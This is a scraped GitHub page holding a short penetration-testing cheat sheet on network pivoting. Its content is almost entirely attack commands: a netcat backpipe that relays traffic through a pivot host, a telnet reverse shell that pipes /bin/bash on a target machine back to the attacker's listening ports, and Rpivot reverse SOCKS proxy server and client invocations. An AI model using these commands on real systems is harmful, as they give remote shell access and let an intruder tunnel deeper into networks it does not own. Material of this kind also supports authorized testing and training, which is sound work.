forked from andrewjkerr/security-cheatsheets
-
Notifications
You must be signed in to change notification settings - Fork 255
/
pivoting
30 lines (21 loc) · 806 Bytes
/
pivoting
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# alex <alexbujduveanu>
#snifer <sniferl4bs>
# To make a FIFO in the file system
mknod [name of file] p
# Pivoting with a backpipe #
# On the attacker:
nc [pivot host]
# On the pivot host
nc localhost 80 <[FIFO file name] | nc -l -p 4444 >[FIFO file name]
# Telnet variant (when netcat is not available on the target) #
# Listen on port 80 in terminal 1 on the attack machine
nc -l -n -v -p 80
# Listen on port 443 in terminal 2 on the attack machine
nc -l -n -v -p 443
# On the target machine:
telnet [attack host] 80 | /bin/bash | telnet [attack host]
#Rpivot is a reverse socks proxy tool that allows you to tunnel traffic via socks proxy
#Server side
python server.py --proxy-port 1080 --server-port 9999 --server-ip 0.0.0.0
#Client side
python client.py --server-ip <ip> --server-port 9999